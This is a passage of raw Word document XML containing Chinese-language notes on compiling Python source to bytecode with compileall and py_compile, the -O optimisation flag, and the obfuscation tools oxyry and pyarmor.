        </w:rPr>
        <w:t>的一个模块，它提供了一个命令行接口，可以编译一个目录树中的所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源文件为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码。这可以加快导入，并可以帮助发现某些类型的导入错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4183E276" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>* `-b`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：这个选项告诉</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`compileall`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块在编译时进行备份。它会为每个已编译的源文件创建一个备份文件，后缀为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`.pyc.bak`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B938EC6" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>* `.`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：这是命令行中的当前目录。这意味着</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`compileall`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将会在当前目录及其所有子目录中查找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源文件并编译它们。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D92DD3" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34BFE712" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>举例来说，如果你在包含多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源文件的目录中运行这个命令，那么这个命令将会：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41107B33" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30532F51" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查找该目录和其所有子目录中的所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源文件（以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`.py`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为扩展名）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024AFD76" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解释器编译这些源文件，将它们转换为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字节码文件（以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`.pyc`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为扩展名）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639C3CE7" w14:textId="313156E0" w:rsidR="002D14D3" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于每个已编译的源文件，它还会创建一个备份文件（以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>`.pyc.bak`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为扩展名）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFFC1FC" w14:textId="77777777" w:rsidR="002D14D3" w:rsidRDefault="002D14D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B19D94" w14:textId="2CD227D0" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>yo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0813740A" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BD511E9" w14:textId="0AA77122" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C812DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pyo</w:t>
      </w:r>
      <w:r w:rsidRPr="00C812DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是优化编译后的程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00C812DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> python -O </w:t>
      </w:r>
      <w:r w:rsidRPr="00C812DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源文件即可将源程序编译为</w:t>
      </w:r>
      <w:r w:rsidRPr="00C812DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pyo</w:t>
      </w:r>
      <w:r w:rsidRPr="00C812DF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD8E32B" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13BDA915" w14:textId="7BB38BAD" w:rsidR="00A17E62" w:rsidRPr="00A17E62" w:rsidRDefault="00A17E62" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A17E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O </w:t>
      </w:r>
      <w:r w:rsidRPr="00A17E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>参数在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python </w:t>
      </w:r>
      <w:r w:rsidRPr="00A17E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> compileall </w:t>
      </w:r>
      <w:r w:rsidRPr="00A17E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中是可选的。该参数表示启用优化，会在生成的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> .pyc </w:t>
      </w:r>
      <w:r w:rsidRPr="00A17E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件中删除一些调试信息和断言语句。在生产环境中，你通常会希望启用这个选项，以减小生成的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A17E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> .pyc </w:t>
      </w:r>
      <w:r w:rsidRPr="00A17E62">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>文件的大小，并减少不必要的调试信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AB6177" w14:textId="1E744907" w:rsidR="00A17E62" w:rsidRDefault="00A17E62" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1270"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3399442C" w14:textId="074F24E1" w:rsidR="00A17E62" w:rsidRDefault="00A17E62" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1270"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A17E62">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python3 -O -m compileall demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DD0892" w14:textId="55B07B5C" w:rsidR="003852CD" w:rsidRDefault="003852CD" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1270"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E757019" w14:textId="77777777" w:rsidR="003852CD" w:rsidRDefault="003852CD" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1270"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C8BF18" w14:textId="77777777" w:rsidR="003852CD" w:rsidRDefault="003852CD" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1270"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1977EE55" w14:textId="77777777" w:rsidR="003852CD" w:rsidRPr="00A17E62" w:rsidRDefault="003852CD" w:rsidP="009222EB">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1270"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC2ECFA" w14:textId="5F8E1BD4" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单文件编译为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11387B7D" w14:textId="77777777" w:rsidR="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE630FE" w14:textId="77777777" w:rsidR="00830A73" w:rsidRPr="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830A73">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00830A73">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>py_compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF25E29" w14:textId="77777777" w:rsidR="00830A73" w:rsidRPr="002D14D3" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00830A73">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>py_compile.compile(r'H:\game\test.py')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3013153A" w14:textId="77777777" w:rsidR="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67220CBD" w14:textId="77777777" w:rsidR="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204F911E" w14:textId="77777777" w:rsidR="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="277EF94D" w14:textId="77777777" w:rsidR="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00830A73">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python -m py_compile test.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2ECACD" w14:textId="77777777" w:rsidR="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1726ED6C" w14:textId="77777777" w:rsidR="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这样会在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件所在的目录下，生成一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>__pycache__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（注意：这里目录名前后有两个下划线）的目录，并且其中存有一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.cpython-35.pyc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pyc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>test.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译之后生成的文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344CE333" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRPr="00830A73" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A46A876" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E703E45" w14:textId="78CE99F6" w:rsidR="00C812DF" w:rsidRPr="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目录下编译为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pyc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8535DA" w14:textId="77777777" w:rsidR="00C812DF" w:rsidRDefault="00C812DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E618393" w14:textId="4B6EFEA2" w:rsidR="00830A73" w:rsidRPr="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00830A73">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r w:rsidRPr="00830A73">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>compileall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78297BE5" w14:textId="0E0189B4" w:rsidR="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00830A73">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>compileall.compile_dir(r'/root/src')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C882D79" w14:textId="6FE746FE" w:rsidR="00830A73" w:rsidRPr="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7990CA1C" w14:textId="46E9D1C4" w:rsidR="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00830A73">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>python -m compileall /root/src/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD33B8C" w14:textId="77777777" w:rsidR="00830A73" w:rsidRDefault="00830A73" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CFDC8AA" w14:textId="77777777" w:rsidR="00D01942" w:rsidRDefault="00D01942" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A7BE9B" w14:textId="6B1FFE30" w:rsidR="00D01942" w:rsidRDefault="00D01942" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="450" w:name="_Toc159779893"/>
      <w:r w:rsidRPr="00D01942">
        <w:t>oxyry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：混淆代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="450"/>
    </w:p>
    <w:p w14:paraId="5FD3FA94" w14:textId="1361AEFD" w:rsidR="00D01942" w:rsidRDefault="000F1A5C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F1A5C">
        <w:t>https://pyob.oxyry.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394E8911" w14:textId="77777777" w:rsidR="00D01942" w:rsidRDefault="00D01942" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D1F7E85" w14:textId="77777777" w:rsidR="00D01942" w:rsidRDefault="00D01942" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48DD877B" w14:textId="77777777" w:rsidR="00D01942" w:rsidRDefault="00D01942" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15271499" w14:textId="77777777" w:rsidR="00D01942" w:rsidRDefault="00D01942" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21905F75" w14:textId="3973FDF3" w:rsidR="00830A73" w:rsidRDefault="00CB6748" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="451" w:name="_Toc159779894"/>
      <w:r w:rsidRPr="00CB6748">
        <w:t>pyarmor</w:t>
      </w:r>
      <w:r w:rsidR="00594C01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：混淆</w:t>
      </w:r>
      <w:r w:rsidR="00D01942">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、编译</w:t>
      </w:r>
      <w:r w:rsidR="00594C01">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="451"/>
    </w:p>
    <w:p w14:paraId="10EC935A" w14:textId="77777777" w:rsidR="00594C01" w:rsidRPr="00594C01" w:rsidRDefault="00594C01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447E8892" w14:textId="092672A7" w:rsidR="00830A73" w:rsidRDefault="00394E46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网：</w:t>
      </w:r>
      <w:r w:rsidR="00476760" w:rsidRPr="00476760">
        <w:t>https://pyarmor.readthedocs.io/zh/latest/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACFB450" w14:textId="77777777" w:rsidR="00394E46" w:rsidRDefault="00394E46" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2564B13F" w14:textId="2408684C" w:rsidR="00081240" w:rsidRPr="00081240" w:rsidRDefault="00081240" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00081240">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>请在相同</w:t>
      </w:r>
      <w:r w:rsidRPr="00081240">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00081240">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>版本、相同平台的机器上运行此混淆代码，否则无法运行。因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00081240">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pyarmor_runtime_000000</w:t>
      </w:r>
      <w:r w:rsidRPr="00081240">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>有扩展模块，所以它是平台相关的并且绑定到</w:t>
      </w:r>
      <w:r w:rsidRPr="00081240">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00081240">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>版本。</w:t>
      </w:r>
    </w:p>
